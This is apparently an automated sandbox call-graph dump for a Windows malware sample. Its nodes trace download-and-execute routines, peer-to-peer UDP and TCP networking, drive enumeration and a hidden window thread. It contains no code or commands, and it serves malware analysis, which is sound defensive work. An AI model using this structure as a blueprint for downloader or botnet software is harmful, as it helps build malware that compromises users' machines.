5 API calls 4733->4734 4739 408897 _invalid_parameter 4733->4739 4734->4739 4735 404237 4735->4517 4735->4518 4736 408590 _invalid_parameter HeapValidate 4736->4739 4737 408940 HeapAlloc 4737->4739 4738 40890a HeapReAlloc 4738->4739 4739->4735 4739->4736 4739->4737 4739->4738 4740 408990 _invalid_parameter 3 API calls 4739->4740 4740->4739 4744 40a8ab 4741->4744 4742 408840 _invalid_parameter 7 API calls 4742->4744 4743 4042c6 4743->4517 4745 4059c0 4743->4745 4744->4742 4744->4743 4746 408840 _invalid_parameter 7 API calls 4745->4746 4747 4059d0 4746->4747 4748 405a17 4747->4748 4749 4059dc memcpy CreateThread CloseHandle 4747->4749 4748->4517 4749->4748 4751 405920 4749->4751 4750->4733 4752 405931 4751->4752 4753 405987 4751->4753 4754 405985 4752->4754 4755 405940 StrChrA 4752->4755 4753->4754 4756 40d210 60 API calls 4753->4756 4757 408990 _invalid_parameter 3 API calls 4754->4757 4758 405955 4755->4758 4756->4754 4759 4059b2 4757->4759 4762 40d210 GetTickCount srand ExpandEnvironmentStringsW 4758->4762 4763 40d25e 4762->4763 4763->4763 4764 40d27c mbstowcs rand rand wsprintfW InternetOpenW 4763->4764 4765 40d480 InternetCloseHandle Sleep 4764->4765 4766 40d315 InternetOpenUrlW 4764->4766 4769 40596f Sleep 4765->4769 4770 40d4a7 6 API calls 4765->4770 4767 40d473 InternetCloseHandle 4766->4767 4768 40d344 CreateFileW 4766->4768 4767->4765 4771 40d373 InternetReadFile 4768->4771 4772 40d466 CloseHandle 4768->4772 4769->4752 4770->4769 4773 40d529 wsprintfW DeleteFileW Sleep 4770->4773 4774 40d3c6 CloseHandle wsprintfW DeleteFileW Sleep 4771->4774 4775 40d397 4771->4775 4772->4767 4776 40cef0 20 API calls 4773->4776 4792 40cef0 CreateFileW 4774->4792 4775->4774 4777 40d3a0 WriteFile 4775->4777 4779 40d569 4776->4779 4777->4771 4781 40d573 Sleep 4779->4781 4782 40d5a7 DeleteFileW 4779->4782 4785 40d0b0 5 API calls 4781->4785 4782->4769 4783 40d459 DeleteFileW 4783->4772 4784 40d41d Sleep 4786 40d0b0 5 API calls 4784->4786 4787 40d58a 4785->4787 4788 40d434 4786->4788 4787->4769 4790 40d59d ExitProcess 4787->4790 4789 40d450 4788->4789 4791 40d448 ExitProcess 4788->4791 4789->4772 4793 40d043 4792->4793 4794 40cf37 CreateFileMappingW 4792->4794 4797 40d049 CreateFileW 4793->4797 4798 40d09a 4793->4798 4795 40cf58 MapViewOfFile 4794->4795 4796 40d039 CloseHandle 4794->4796 4799 40cf77 GetFileSize 4795->4799 4800 40d02f CloseHandle 4795->4800 4796->4793 4801 40d091 4797->4801 4802 40d06b WriteFile CloseHandle 4797->4802 4798->4783 4798->4784 4803 40cf93 4799->4803 4804 40d025 UnmapViewOfFile 4799->4804 4800->4796 4805 408990 _invalid_parameter 3 API calls 4801->4805 4802->4801 4813 40af00 4803->4813 4804->4800 4805->4798 4808 40a8a0 7 API calls 4809 40cfde 4808->4809 4809->4804 4810 40d012 4809->4810 4811 408990 _invalid_parameter 3 API calls 4810->4811 4812 40d01b 4811->4812 4812->4804 4814 40a990 10 API calls 4813->4814 4815 40af24 4814->4815 4815->4804 4815->4808 4817 40c2cd htons inet_addr setsockopt 4816->4817 4823 40c3fe 4816->4823 4818 409260 8 API calls 4817->4818 4819 40c346 bind lstrlenA sendto ioctlsocket 4818->4819 4824 40c39b 4819->4824 4820 40c3c2 4873 409320 shutdown closesocket 4820->4873 4823->4314 4824->4820 4825 408880 9 API calls 4824->4825 4864 40c1b0 4824->4864 4825->4824 4880 40bf80 memset InternetCrackUrlA InternetOpenA 4826->4880 4830 408990 _invalid_parameter 3 API calls 4831 40ca6e 4830->4831 4831->4314 4835 40ca3b 4835->4830 4838 40ca31 SysFreeString 4838->4835 4987 409220 inet_addr 4841->4987 4844 40930d 4849 40ccc0 4844->4849 4845 4092bc connect 4846 4092d0 getsockname 4845->4846 4847 409304 4845->4847 4846->4847 4990 409320 shutdown closesocket 4847->4990 4991 409200 inet_ntoa 4849->4991 4851 40ccd6 4852 40b100 11 API calls 4851->4852 4853 40ccf5 4852->4853 4859 40cd38 4853->4859 4992 40ca80 memset InternetCrackUrlA InternetOpenA 4853->4992 4856 40cd2c 4857 408990 _invalid_parameter 3 API calls 4856->4857 4857->4859 4858 408990 _invalid_parameter 3 API calls 4858->4856 4859->4319 4861 408ab4 4860->4861 4862 408aba 4861->4862 4863 408990 GetCurrentProcessId HeapValidate RtlFreeHeap _invalid_parameter 4861->4863 4862->4309 4863->4861 4872 40c1cc 4864->4872 4865 40c294 4865->4824 4866 40c1e8 recvfrom 4867 40c216 StrCmpNIA 4866->4867 4868 40c209 Sleep 4866->4868 4869 40c235 StrStrIA 4867->4869 4867->4872 4868->4872 4870 40c256 StrChrA 4869->4870 4869->4872 4874 40afb0 4870->4874 4872->4865 4872->4866 4873->4823 4875 40afbb 4874->4875 4876 40afc1 lstrlenA 4875->4876 4877 40afd4 4875->4877 4878 408840 _invalid_parameter 7 API calls 4875->4878 4879 40aff0 memcpy 4875->4879 4876->4875 4876->4877 4877->4872 4878->4875 4879->4875 4879->4877 4881 40c021 InternetConnectA 4880->4881 4882 40c197 4880->4882 4883 40c18a InternetCloseHandle 4881->4883 4884 40c05a HttpOpenRequestA 4881->4884 4882->4831 4893 40bd20 4882->4893 4883->4882 4885 40c090 HttpSendRequestA 4884->4885 4886 40c17d InternetCloseHandle 4884->4886 4887 40c170 InternetCloseHandle 4885->4887 4890 40c0ad 4885->4890 4886->4883 4887->4886 4888 40c0fb 4888->4887 4889 40c0ce InternetReadFile 4889->4888 4889->4890 4890->4888 4890->4889 4891 408880 9 API calls 4890->4891 4892 40c116 memcpy 4891->4892 4892->4890 4922 403ce0 4893->4922 4896 40be20 4896->4835 4903 40c900 4896->4903 4897 40bd4a SysAllocString 4898 40bd61 CoCreateInstance 4897->4898 4899 40be17 4897->4899 4900 40be0d SysFreeString 4898->4900 4902 40bd86 4898->4902 4901 408990 _invalid_parameter 3 API calls 4899->4901 4900->4899 4901->4896 4902->4900 4939 40be30 4903->4939 4906 40c7e0 4944 40c600 4906->4944 4911 40c760 6 API calls 4912 40c837 4911->4912 4918 40c889 4912->4918 4961 40c580 4912->4961 4915 40c86f 4915->4918 4966 40bf20 4915->4966 4916 40c580 6 API calls 4916->4915 4918->4838 4919 40b100 4918->4919 4982 40b070 4919->4982 4925 403ced 4922->4925 4923 403cf3 lstrlenA 4923->4925 4929 403d06 4923->4929 4925->4923 4926 408840 _invalid_parameter 7 API calls 4925->4926 4928 408990 _invalid_parameter 3 API calls 4925->4928 4925->4929 4930 403bc0 4925->4930 4934 403c90 4925->4934 4926->4925 4928->4925 4929->4896 4929->4897 4931 403bd7 MultiByteToWideChar 4930->4931 4932 403bca lstrlenA 4930->4932 4933 403bfc 4931->4933 4932->4931 4933->4925 4935 403c9b 4934->4935 4936 403ca1 lstrlenA 4935->4936 4937 403bc0 2 API calls 4935->4937 4938 403cd7 4935->4938 4936->4935 4937->4935 4938->4925 4942 40be56 4939->4942 4940 40bed3 lstrcmpiW 4940->4942 4943 40beeb SysFreeString 4940->4943 4941 40befb 4941->4835 4941->4906 4942->4940 4942->4941 4942->4943 4943->4942 4946 40c626 4944->4946 4945 40c73d 4945->4918 4956 40c760 4945->4956 4946->4945 4947 40c6b3 lstrcmpiW 4946->4947 4948 40c733 SysFreeString 4947->4948 4949 40c6c6 4947->4949 4948->4945 4950 40bf20 2 API calls 4949->4950 4952 40c6d4 4950->4952 4951 40c725 4951->4948 4952->4948 4952->4951 4953 40c703 lstrcmpiW 4952->4953 4954 40c715 4953->4954 4955 40c71b SysFreeString 4953->4955 4954->4955 4955->4951 4957 40bf20 2 API calls 4956->4957 4959 40c77b 4957->4959 4958 40c7b7 4958->4911 4958->4918 4959->4958 4960 40c600 6 API calls 4959->4960 4960->4958 4962 40bf20 2 API calls 4961->4962 4963 40c59b 4962->4963 4965 40c5d7 4963->4965 4970 40c420 4963->4970 4965->4915 4965->4916 4967 40bf46 4966->4967 4968 40be30 2 API calls 4967->4968 4969 40bf5d 4967->4969 4968->4969 4969->4918 4971 40c446 4970->4971 4972 40c55d 4971->4972 4973 40c4d3 lstrcmpiW 4971->4973 4972->4965 4974 40c553 SysFreeString 4973->4974 4975 40c4e6 4973->4975 4974->4972 4976 40bf20 2 API calls 4975->4976 4978 40c4f4 4976->4978 4977 40c545 4977->4974 4978->4974 4978->4977 4979 40c523 lstrcmpiW 4978->4979 4980 40c535 4979->4980 4981 40c53b SysFreeString 4979->4981 4980->4981 4981->4977 4986 40b07d 4982->4986 4983 40b098 SysFreeString 4983->4838 4984 408880 9 API calls 4984->4986 4985 40b020 _vscprintf wvsprintfA 4985->4986 4986->4983 4986->4984 4986->4985 4988 40924c socket 4987->4988 4989 409239 gethostbyname 4987->4989 4988->4844 4988->4845 4989->4988 4990->4844 4991->4851 4993 40ccb1 4992->4993 4994 40cb24 InternetConnectA 4992->4994 4993->4856 4993->4858 4995 40cca4 InternetCloseHandle 4994->4995 4996 40cb5d HttpOpenRequestA 4994->4996 4995->4993 4997 40cb93 HttpAddRequestHeadersA HttpSendRequestA 4996->4997 4998 40cc97 InternetCloseHandle 4996->4998 4999 40cc8a InternetCloseHandle 4997->4999 5002 40cbdd 4997->5002 4998->4995 4999->4998 5000 40cbf4 InternetReadFile 5001 40cc21 5000->5001 5000->5002 5001->4999 5002->5000 5002->5001 5003 408880 9 API calls 5002->5003 5004 40cc3c memcpy 5003->5004 5004->5002 5011 405677 5005->5011 5006 4055f0 CoCreateInstance 5006->5011 5007 40584b 5009 405854 SysFreeString 5007->5009 5010 40585e SysFreeString 5007->5010 5008 408990 _invalid_parameter 3 API calls 5008->5007 5009->5010 5010->4322 5011->5006 5012 4057c6 SysAllocString 5011->5012 5013 405692 5011->5013 5012->5011 5012->5013 5013->5007 5013->5008 5015 40a5de 5014->5015 5017 40a5da 5014->5017 5018 40a590 CryptAcquireContextW 5015->5018 5017->4328 5019 40a5cb 5018->5019 5020 40a5ad CryptGenRandom CryptReleaseContext 5018->5020 5019->5017 5020->5019 5021->4344 5061 409490 gethostname 5022->5061 5026 40977c strstr 5027 40978c 5026->5027 5028 4097cd 5026->5028 5076 409200 inet_ntoa 5027->5076 5065 409200 inet_ntoa 5028->5065 5031 4097db strstr 5033 4097eb 5031->5033 5034 40982c EnterCriticalSection 5031->5034 5032 40979a strstr 5035 409769 5032->5035 5036 4097aa 5032->5036 5078 409200 inet_ntoa 5033->5078 5038 409844 5034->5038 5035->4344 5077 409200 inet_ntoa 5036->5077 5046 40986f 5038->5046 5080 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 5038->5080 5040 4097b8 strstr 5040->5028 5040->5035 5041 4097f9 strstr 5041->5035 5042 409809 5041->5042 5079 409200 inet_ntoa 5042->5079 5045 409968 LeaveCriticalSection 5045->5035 5046->5045 5048 408820 7 API calls 5046->5048 5047 409817 strstr 5047->5034 5047->5035 5049 4098b3 5048->5049 5049->5045 5066 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 5049->5066 5051 4098d1 5052 4098f3 Sleep 5051->5052 5053 4098fd 5051->5053 5055 409923 5051->5055 5052->5051 5054 408990 _invalid_parameter 3 API calls 5053->5054 5054->5055 5055->5045 5067 409380 5055->5067 5058 409380 14 API calls 5057->5058 5059 409483 LeaveCriticalSection 5058->5059 5059->4349 5060->4356 5062 4094b7 gethostbyname 5061->5062 5063 4094d3 5061->5063 5062->5063 5063->5035 5064 409200 inet_ntoa 5063->5064 5064->5026 5065->5031 5066->5051 5068 409394 5067->5068 5075 40938f 5067->5075 5069 408840 _invalid_parameter 7 API calls 5068->5069 5071 4093a8 5069->5071 5070 409404 CreateFileW 5072 409453 InterlockedExchange 5070->5072 5073 409427 WriteFile FlushFileBuffers CloseHandle 5070->5073 5071->5070 5071->5075 5074 408990 _invalid_parameter 3 API calls 5072->5074 5073->5072 5074->5075 5075->5045 5076->5032 5077->5040 5078->5041 5079->5047 5080->5046 5082 40b84d 5081->5082 5083 40b8b1 5082->5083 5084 40b871 WaitForSingleObject 5082->5084 5083->4363 5083->4364 5084->5082 5085 40b88c CloseHandle 5084->5085 5085->5082 5087 409343 WaitForSingleObject 5086->5087 5088 409371 5087->5088 5089 40935b InterlockedDecrement 5087->5089 5090 40936a 5089->5090 5090->5087 5091 409470 16 API calls 5090->5091 5091->5090 5150 40e9b0 5092->5150 5095 40b800 5096 40b7e7 WaitForSingleObject 5154 40de00 5096->5154 5099 40b5c4 5098->5099 5101 40b5e0 WaitForSingleObject 5099->5101 5103 40b605 5099->5103 5222 4099a0 EnterCriticalSection 5099->5222 5227 40b420 InterlockedExchangeAdd 5099->5227 5101->5099 5101->5103 5403 40d5c0 5104->5403 5106 40bce7 5107 40bd11 5106->5107 5108 40bcf8 WaitForSingleObject 5106->5108 5417 40da20 5108->5417 5111 40e792 5110->5111 5112 40e808 5110->5112 5113 40e797 WSAGetOverlappedResult 5111->5113 5456 40e560 5111->5456 5113->5111 5114 40e7b9 WSAGetLastError 5113->5114 5114->5111 5116 40e7d3 GetQueuedCompletionStatus 5116->5111 5116->5112 5118 40e2c9 5117->5118 5119 40e14d WSAWaitForMultipleEvents 5117->5119 5120 40e1f0 GetTickCount 5119->5120 5121 40e16a WSAEnumNetworkEvents 5119->5121 5122 40e243 GetTickCount 5120->5122 5123 40e205 EnterCriticalSection 5120->5123 5121->5120 5135 40e183 5121->5135 5124 40e2b5 WaitForSingleObject 5122->5124 5125 40e24e EnterCriticalSection 5122->5125 5126 40e216 5123->5126 5127 40e23a LeaveCriticalSection 5123->5127 5124->5118 5124->5119 5129 40e2a1 LeaveCriticalSection GetTickCount 5125->5129 5130 40e25f InterlockedExchangeAdd 5125->5130 5133 40e229 LeaveCriticalSection 5126->5133 5511 40e020 5126->5511 5127->5124 5128 40e192 accept 5128->5120 5128->5135 5129->5124 5521 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 5130->5521 5133->5124 5135->5120 5135->5128 5138 40e1e9 5135->5138 5491 40dcb0 5135->5491 5137 40e272 5137->5129 5137->5130 5522 409320 shutdown closesocket 5137->5522 5139 40e4f0 7 API calls 5138->5139 5139->5120 5536 40da90 5140->5536 5142 40bcbd 5143 4099a0 5 API calls 5144 40bc3e 5143->5144 5144->5142 5144->5143 5145 40bc58 InterlockedExchangeAdd 5144->5145 5146 40bc9c WaitForSingleObject 5144->5146 5149 409dd0 18 API calls 5144->5149 5145->5144 5145->5146 5146->5144 5147 40bcb5 5146->5147 5148 40da20 8 API calls 5147->5148 5148->5142 5149->5144 5151 40e9b7 5150->5151 5153 40b7d6 5150->5153 5151->5153 5175 40e820 5151->5175 5153->5095 5153->5096 5155 40df32 5154->5155 5156 40de08 5154->5156 5155->5095 5156->5155 5157 40de14 EnterCriticalSection 5156->5157 5158 40deb0 LeaveCriticalSection SetEvent 5157->5158 5163 40de2b 5157->5163 5159 40dee3 5158->5159 5160 40decb 5158->5160 5203 40b9b0 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 5159->5203 5161 40ded1 PostQueuedCompletionStatus 5160->5161 5161->5159 5161->5161 5163->5158 5164 40de3c InterlockedDecrement 5163->5164 5166 40de55 InterlockedExchangeAdd 5163->5166 5173 40de9b InterlockedDecrement 5163->5173 5164->5163 5165 40deee 5212 40baf0 5165->5212 5166->5163 5168 40de68 InterlockedIncrement 5166->5168 5197 40e450 WSARecv 5168->5197 5172 40df1f DeleteCriticalSection 5174 408990 _invalid_parameter 3 API calls 5172->5174 5173->5163 5174->5155 5176 408820 7 API calls 5175->5176 5177 40e82b 5176->5177 5178 40e9a6 5177->5178 5179 40e838 GetSystemInfo InitializeCriticalSection CreateEventA 5177->5179 5178->5153 5180 40e876 CreateIoCompletionPort 5179->5180 5181 40e99f 5179->5181 5180->5181 5182 40e88f 5180->5182 5183 40de00 36 API calls 5181->5183 5184 40b810 8 API calls 5182->5184 5185 40e9a4 5183->5185 5186 40e894 5184->5186 5185->5178 5186->5181 5187 40e89f WSASocketA 5186->5187 5187->5181 5188 40e8bd setsockopt htons bind 5187->5188 5188->5181 5189 40e926 listen 5188->5189 5189->5181 5190 40e93a WSACreateEvent 5189->5190 5190->5181 5191 40e947 WSAEventSelect 5190->5191 5191->5181 5195 40e959 5191->5195 5192 40e97f 5194 40b8c0 301 API calls 5192->5194 5193 40b8c0 301 API calls 5193->5195 5196 40e994 5194->5196 5195->5192 5195->5193 5196->5153 5198 40e4d2 5197->5198 5199 40e48e 5197->5199 5198->5163 5200 40e490 WSAGetLastError 5199->5200 5201 40e4a4 Sleep WSARecv 5199->5201 5202 40e4db 5199->5202 5200->5198 5200->5199 5201->5198 5201->5200 5202->5163 5204 40b9e6 InterlockedExchangeAdd 5203->5204 5205 40bac9 GetCurrentThread SetThreadPriority 5203->5205 5204->5205 5209 40ba00 5204->5209 5205->5165 5206 40ba19 EnterCriticalSection 5206->5209 5207 40ba87 LeaveCriticalSection 5207->5209 5211 40ba9e 5207->5211 5208 40ba63 WaitForSingleObject 5208->5209 5209->5205 5209->5206 5209->5207 5209->5208 5210 40babc Sleep 5209->5210 5209->5211 5210->5209 5211->5205 5213 40bafc EnterCriticalSection 5212->5213 5220 40bb72 CloseHandle CloseHandle WSACloseEvent 5212->5220 5216 40bb18 5213->5216 5214 40bb40 LeaveCriticalSection DeleteCriticalSection 5217 408990 _invalid_parameter 3 API calls 5214->5217 5215 40bb2b CloseHandle 5215->5216 5216->5214 5216->5215 5218 40bb66 5217->5218 5219 408990 _invalid_parameter 3 API calls 5218->5219 5219->5220 5221 409320 shutdown closesocket 5220->5221 5221->5172 5223 4099d7 LeaveCriticalSection 5222->5223 5224 4099bf 5222->5224 5223->5099 5225 40a5d0 3 API calls 5224->5225 5226 4099ca 5225->5226 5226->5223 5228 40b43d 5227->5228 5238 40b436 5227->5238 5244 40b330 5228->5244 5231 40b45d InterlockedIncrement 5241 40b467 5231->5241 5233 40b490 5268 409200 inet_ntoa 5233->5268 5235 40b49c 5236 40b560 InterlockedDecrement 5235->5236 5269 409320 shutdown closesocket 5236->5269 5238->5099 5239 408840 _invalid_parameter 7 API calls 5239->5241 5240 40b260 6 API calls 5240->5241 5241->5233 5241->5236 5241->5239 5241->5240 5243 408990 _invalid_parameter 3 API calls 5241->5243 5251 409dd0 5241->5251 5254 409f30 5241->5254 5243->5241 5245 40b33d socket 5244->5245 5246 40b352 htons connect 5245->5246 5247 40b3af 5245->5247 5246->5247 5248 40b39a 5246->5248 5247->5245 5249 40b3a3 5247->5249 5270 409320 shutdown closesocket 5248->5270 5249->5231 5249->5238 5271 409be0 5251->5271 5259 409f41 5254->5259 5257 408990 _invalid_parameter 3 API calls 5258 40a2c4 5257->5258 5258->5241 5260 409c80 25 API calls 5259->5260 5263 409dd0 18 API calls 5259->5263 5264 409980 28 API calls 5259->5264 5265 409f5f 5259->5265 5310 409e50 5259->5310 5317 4099f0 EnterCriticalSection 5259->5317 5322 405590 5259->5322 5327 4054c0 5259->5327 5330 405550 5259->5330 5335 405460 5259->5335 5260->5259 5263->5259 5264->5259 5265->5257 5268->5235 5269->5238 5270->5249 5272 40a610 3 API calls 5271->5272 5273 409beb 5272->5273 5274 409c07 lstrlenA 5273->5274 5275 40a8a0 7 API calls 5274->5275 5276 409c3d 5275->5276 5279 409c68 5276->5279 5282 40b200 5276->5282 5287 40bbb0 5276->5287 5277 409c5c 5278 408990 _invalid_parameter 3 API calls 5277->5278 5278->5279 5279->5241 5290 40b1a0 5282->5290 5285 40b22e 5285->5277 5286 40b1a0 send 5286->5285 5294 40d8f0 5287->5294 5289 40bbd1 5289->5277 5291 40b1b1 send 5290->5291 5292 40b1e5 5291->5292 5293 40b1ce 5291->5293 5292->5285 5292->5286 5293->5291 5293->5292 5295 40d90f 5294->5295 5308 40da03 5294->5308 5296 408840 _invalid_parameter 7 API calls 5295->5296 5295->5308 5297 40d936 memcpy htons 5296->5297 5298 40d9dc 5297->5298 5299 40d986 sendto 5297->5299 5300 408990 _invalid_parameter 3 API calls 5298->5300 5301 40d9a5 InterlockedExchangeAdd 5299->5301 5302 40d9d8 5299->5302 5303 40d9eb 5300->5303 5301->5299 5304 40d9bb 5301->5304 5302->5298 5305 40d9f9 5302->5305 5303->5289 5307 408990 _invalid_parameter 3 API calls 5304->5307 5306 408990 _invalid_parameter 3 API calls 5305->5306 5306->5308 5309 40d9ca 5307->5309 5308->5289 5309->5289 5311 409e61 lstrlenA 5310->5311 5312 40a8a0 7 API calls 5311->5312 5316 409e7f 5312->5316 5313 408990 _invalid_parameter 3 API calls 5315 409f0f 5313->5315 5314 409e8b 5314->5313 5314->5315 5315->5259 5316->5311 5316->5314 5318 409a08 5317->5318 5319 409a44 LeaveCriticalSection 5318->5319 5342 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 5318->5342 5319->5259 5321 409a33 5321->5319 5343 4054f0 5322->5343 5325 4055dc 5325->5259 5356 4046a0 EnterCriticalSection 5327->5356 5329 4054e2 5329->5259 5331 4054f0 65 API calls 5330->5331 5332 405564 5331->5332 5333 405589 5332->5333 5334 40b8c0 312 API calls 5332->5334 5333->5259 5334->5333 5391 4045e0 EnterCriticalSection 5335->5391 5337 40547a 5341 4054ad 5337->5341 5396 405370 5337->5396 5340 408990 _invalid_parameter 3 API calls 5340->5341 5341->5259 5342->5321 5346 405503 5343->5346 5344 405540 5344->5325 5347 405410 5344->5347 5346->5344 5350 4044f0 EnterCriticalSection 5346->5350 5348 409be0 18 API calls 5347->5348 5349 405455 5348->5349 5349->5325 5351 40af30 63 API calls 5350->5351 5353 404510 5351->5353 5352 4045be LeaveCriticalSection 5352->5346 5353->5352 5354 408990 _invalid_parameter 3 API calls 5353->5354 5355 4045bb 5354->5355 5355->5352 5380 40af90 5356->5380 5359 4048de LeaveCriticalSection 5359->5329 5360 40af30 63 API calls 5362 4046db 5360->5362 5361 4047f3 5363 40481c 5361->5363 5366 404210 68 API calls 5361->5366 5362->5359 5362->5361 5365 408990 _invalid_parameter 3 API calls 5362->5365 5364 408990 _invalid_parameter 3 API calls 5363->5364 5367 40483d 5364->5367 5368 404752 5365->5368 5366->5363 5367->5359 5369 40484c CreateFileW 5367->5369 5370 408a00 8 API calls 5368->5370 5369->5359 5371 40486f 5369->5371 5372 404762 5370->5372 5375 4048ca FlushFileBuffers CloseHandle 5371->5375 5376 40488c WriteFile 5371->5376 5373 408990 _invalid_parameter 3 API calls 5372->5373 5374 404789 5373->5374 5377 40a8a0 7 API calls 5374->5377 5375->5359 5376->5371 5378 4047c0 5377->5378 5379 4059c0 65 API calls 5378->5379 5379->5361 5383 40a4e0 5380->5383 5387 40a4f3 5383->5387 5384 408a00 8 API calls 5384->5387 5385 40a50d 5388 408990 _invalid_parameter 3 API calls 5385->5388 5386 40a440 62 API calls 5386->5387 5387->5384 5387->5385 5387->5386 5390 406300 61 API calls 5387->5390 5389 4046c4 5388->5389 5389->5359 5389->5360 5390->5387 5392 4045fe 5391->5392 5393 40468a LeaveCriticalSection 5392->5393 5394 408a00 8 API calls 5392->5394 5393->5337 5395 40465c 5394->5395 5395->5393 5397 408840 _invalid_parameter 7 API calls 5396->5397 5398 405382 memcpy 5397->5398 5399 409be0 18 API calls 5398->5399 5400 4053ec 5399->5400 5401 408990 _invalid_parameter 3 API calls 5400->5401 5402 4053fb 5401->5402 5402->5340 5404 40d5ce 5403->5404 5411 40d6ae 5403->5411 5405 408820 7 API calls 5404->5405 5404->5411 5406 40d5de CreateEventA socket 5405->5406 5407 40d615 5406->5407 5408 40d61c 5406->5408 5409 40da20 8 API calls 5407->5409 5410 40d624 htons setsockopt bind 5408->5410 5408->5411 5412 40d61a 5409->5412 5413 40d694 CreateThread 5410->5413 5414 40d688 5410->5414 5411->5106 5412->5408 5413->5411 5427 40d7f0 5413->5427 5415 40da20 8 API calls 5414->5415 5416 40d68d 5415->5416 5416->5106 5418 40da24 5417->5418 5425 40da80 5417->5425 5419 40da2c SetEvent WaitForSingleObject CloseHandle 5418->5419 5418->5425 5421 40da54 5419->5421 5426 40da70 5419->5426 5423 408990 GetCurrentProcessId HeapValidate RtlFreeHeap _invalid_parameter 5421->5423 5421->5426 5422 40da7a 5424 408990 _invalid_parameter 3 API calls 5422->5424 5423->5421 5424->5425 5425->5107 5455 409320 shutdown closesocket 5426->5455 5428 40d805 ioctlsocket 5427->5428 5429 40d8d0 5428->5429 5431 40d82a 5428->5431 5430 408990 _invalid_parameter 3 API calls 5429->5430 5433 40d8d6 5430->5433 5432 40d8b9 WaitForSingleObject 5431->5432 5434 40d854 recvfrom 5431->5434 5435 408880 9 API calls 5431->5435 5436 40d899 InterlockedExchangeAdd 5431->5436 5432->5428 5432->5429 5434->5431 5434->5432 5435->5431 5438 40d6c0 5436->5438 5439 40d6f5 5438->5439 5441 408820 7 API calls 5439->5441 5443 40d71f 5439->5443 5441->5443 5442 40d742 5449 40db50 5442->5449 5448 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 5443->5448 5445 40d7de 5445->5431 5446 40d755 5446->5445 5447 40d7cb memmove 5446->5447 5447->5446 5448->5442 5450 40db62 5449->5450 5451 40db75 memcpy 5449->5451 5452 408880 9 API calls 5450->5452 5453 40db91 5451->5453 5454 40db6f 5452->5454 5453->5446 5454->5451 5455->5422 5457 40e6f2 InterlockedDecrement setsockopt closesocket 5456->5457 5458 40e574 5456->5458 5460 40e639 5457->5460 5458->5457 5459 40e57c 5458->5459 5476 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 5459->5476 5460->5116 5462 40e581 InterlockedExchange 5463 40e598 5462->5463 5464 40e64e 5462->5464 5463->5460 5469 40e5a9 InterlockedDecrement 5463->5469 5470 40e5bc InterlockedDecrement InterlockedExchangeAdd 5463->5470 5465 40e667 5464->5465 5466 40e657 InterlockedDecrement 5464->5466 5467 40e672 5465->5467 5468 40e687 InterlockedDecrement 5465->5468 5466->5116 5485 40e2e0 WSASend 5467->5485 5472 40e6e9 5468->5472 5469->5116 5473 40e62f 5470->5473 5472->5116 5477 40e4f0 5473->5477 5474 40e67e 5474->5116 5476->5462 5478 40e500 InterlockedExchangeAdd 5477->5478 5479 40e4fc 5477->5479 5480 40e553 5478->5480 5481 40e517 InterlockedIncrement 5478->5481 5479->5460 5480->5460 5482 40e450 4 API calls 5481->5482 5483 40e546 5482->5483 5483->5480 5484 40e54c InterlockedDecrement 5483->5484 5484->5480 5486 40e350 5485->5486 5487 40e312 WSAGetLastError 5485->5487 5486->5474 5487->5486 5488 40e31f 5487->5488 5489 40e356 5488->5489 5490 40e326 Sleep WSASend 5488->5490 5489->5474 5490->5486 5490->5487 5492 40dcc2 EnterCriticalSection 5491->5492 5493 40dcbd 5491->5493 5494 40dcd7 5492->5494 5495 40dced LeaveCriticalSection 5492->5495 5493->5135 5494->5495 5496 40dcf8 5495->5496 5497 40dcff 5495->5497 5496->5135 5498 408820 7 API calls 5497->5498 5499 40dd09 5498->5499 5500 40dd16 getpeername CreateIoCompletionPort 5499->5500 5501 40dda8 5499->5501 5503 40dda2 5500->5503 5504 40dd56 5500->5504 5525 409320 shutdown closesocket 5501->5525 5507 408990 _invalid_parameter 3 API calls 5503->5507 5523 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 5504->5523 5505 40ddb3 5505->5135 5507->5501 5508 40dd5b InterlockedExchange InitializeCriticalSection InterlockedIncrement 5524 40dbd0 EnterCriticalSection LeaveCriticalSection 5508->5524 5510 40dd9b 5510->5135 5512 40e030 5511->5512 5519 40e101 5511->5519 5513 40e03d InterlockedExchangeAdd 5512->5513 5512->5519 5513->5519 5520 40e054 5513->5520 5514 40e080 5515 40e091 5514->5515 5535 409320 shutdown closesocket 5514->5535 5517 40e0a7 InterlockedDecrement 5515->5517 5515->5519 5517->5519 5519->5127 5520->5514 5520->5519 5526 40dfa0 EnterCriticalSection 5520->5526 5521->5137 5522->5137 5523->5508 5524->5510 5525->5505 5527 40e007 LeaveCriticalSection 5526->5527 5528 40dfba InterlockedExchangeAdd 5526->5528 5527->5520 5529 40dfca LeaveCriticalSection 5528->5529 5530 40dfd9 5528->5530 5529->5520 5531 408990 _invalid_parameter 3 API calls 5530->5531 5532 40dffe 5531->5532 5533 408990 _invalid_parameter 3 API calls 5532->5533 5534 40e004 5533->5534 5534->5527 5535->5515 5537 408820 7 API calls 5536->5537 5538 40da9b CreateEventA socket 5537->5538 5539 40dad2 5538->5539 5540 40dad9 5538->5540 5541 40da20 8 API calls 5539->5541 5542 40db3a 5540->5542 5543 40dadd bind 5540->5543 5544 40dad7 5541->5544 5542->5144 5545 40db10 5543->5545 5546 40db1c CreateThread 5543->5546 5544->5540 5547 40da20 8 API calls 5545->5547 5546->5542 5549 40d7f0 19 API calls _invalid_parameter 5546->5549 5548 40db15 5547->5548 5548->5144 5551 404129 memset GetModuleHandleW 5550->5551 5552 404162 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5551->5552 5552->5552 5553 4041a0 CreateWindowExW 5552->5553 5554 4041cb 5553->5554 5555 4041cd GetMessageA 5553->5555 5556 4041ff ExitThread 5554->5556 5557 4041e1 TranslateMessage DispatchMessageA 5555->5557 5558 4041f7 5555->5558 5557->5555 5558->5551 5558->5556 5581 40cea0 CreateFileW 5559->5581 5561 405358 ExitThread 5563 405200 5563->5561 5564 405348 Sleep 5563->5564 5565 405239 5563->5565 5584 4049e0 GetLogicalDrives 5563->5584 5564->5563 5590 404980 5565->5590 5568 405270 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5570 4052e6 wsprintfW 5568->5570 5571 4052fb wsprintfW 